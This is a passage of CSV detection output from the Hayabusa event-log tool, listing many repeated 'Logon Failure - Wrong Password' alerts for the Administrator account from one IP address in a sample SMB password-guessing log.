NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: 